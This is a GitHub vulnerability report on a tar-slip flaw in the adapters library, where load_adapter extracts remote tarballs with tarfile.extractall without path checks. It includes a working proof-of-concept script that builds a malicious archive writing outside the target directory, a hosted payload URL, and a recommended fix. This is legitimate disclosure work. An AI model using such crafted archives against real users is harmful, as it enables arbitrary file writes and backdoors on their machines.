-
Notifications
You must be signed in to change notification settings - Fork 375
Description
Description
The adapters library supports loading adapter from remote URLs and, when the file is recognized as a tarball, extracts it with tarfile.extractall(...) directly into a target directory. An attacker-controlled tarball can include entries with absolute paths or ../ sequences to write files outside the extraction directory (tar-slip). Because the loader only checks tarfile.is_tarfile() and not the member paths, a malicious archive fetched from a remote URL will write arbitrary files on the victim host during load_adapter(...). The attacker can even disguise the archive by changing its extension (e.g., .zip) while retaining tar content.
Root cause
The vulnerable code calls tarfile.extractall() without validating member names:
adapters/src/adapters/utils.py
Lines 460 to 463 in e10ebf0
| elif tarfile.is_tarfile(output_path): | |
| tar_file = tarfile.open(output_path) | |
| tar_file.extractall(output_path_extracted) | |
| tar_file.close() |
tarfile.extractall will extract members with absolute paths or .. components as given. There is no sanitization or canonical-path check to ensure extracted paths remain inside output_path_extracted.
Proof of Concept
- Create a malicious tarball which contains a file with an absolute path (or
..path):
import tarfile
from io import BytesIO
def create_malicious_tar(tar_path):
with tarfile.open(tar_path, "w:gz") as tf:
# file written to /tmp/hacked.txt on extraction
info = tarfile.TarInfo(name="/tmp/hacked.txt")
data = b"You have been hacked!\n"
info.size = len(data)
tf.addfile(info, fileobj=BytesIO(data))
# include normal adapter files so archive looks legitimate
info = tarfile.TarInfo(name="adapter_config.json")
data = b'{"some":"config"}\n'
info.size = len(data)
tf.addfile(info, fileobj=BytesIO(data))
info = tarfile.TarInfo(name="pytorch_adapter.bin")
data = b"FAKEBINARY"
info.size = len(data)
tf.addfile(info, fileobj=BytesIO(data))
create_malicious_tar("adapter.tar.gz")
print("Created malicious tar: adapter.tar.gz")- Host the malicious tarball online (attacker can name it
adapter.zipto disguise it). - When users are attracted to the adapter archive and use adapters library to load it.
from adapters import AutoAdapterModel
model = AutoAdapterModel.from_pretrained("roberta-base")
url = "https://huggingface.co/XManFromXlab/adapters-load_adapters-tarslip/resolve/main/adapter.zip"
adapter_name = model.load_adapter(url)- When
load_adapterdownloads and passes the file to thetarfilebranch,extractallwill write/tmp/hacked.txt(or any crafted path) on the host. The archive can be made to overwrite arbitrary writable files or place webhooks/backdoors in predictable locations.
Notes: tarfile.is_tarfile() will return true for tar content regardless of filename/extension, so using a misleading extension does not prevent the attack.
Impact
This is a high-severity arbitrary file-write vulnerability. A remote attacker who can host an adapter archive (or trick users into loading one) can write files anywhere the process has write permission, create persistent indicators, drop scripts, overwrite configuration or keys, or otherwise escalate to further compromise. The attack is fully automated — merely calling load_adapter(url) on a maliciously crafted archive triggers the write.
Recommended fixes
Replace tarfile.extractall with a safe extractor that sanitizes member paths.
Refer to the implementation in Keras: https://github.com/keras-team/keras/blob/47d1cba8ece3cd0776d95e8007dbd0ad5a8c641a/keras/src/utils/file_utils.py#L56-L116